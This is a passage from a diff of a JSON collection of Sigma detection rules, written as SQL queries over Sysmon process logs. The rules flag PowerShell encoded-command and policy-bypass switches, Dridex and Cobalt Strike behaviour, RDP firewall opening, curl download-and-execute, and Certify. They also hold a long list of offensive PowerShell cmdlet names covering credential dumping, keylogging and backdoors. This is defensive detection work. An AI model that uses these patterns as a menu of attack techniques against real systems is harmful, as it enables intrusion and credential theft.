'\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "status": "stable", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "status": "test", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", + "author": "Sander Wiebing", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", + "title": "PowerShell Base64 Encoded Invoke Keyword", + "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", - "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "status": "experimental", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1553" + "attack.t1055" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "HackTool - Certify Execution", + "id": "762f2482-ff21-4970-8939-0aa317a886bb", + "status": "experimental", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" + "filename": "proc_creation_win_hktl_certify.yml" }, { - "title": "CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "status": "experimental", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.t1574.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", - "status": "test", - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", + "status": "experimental", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE 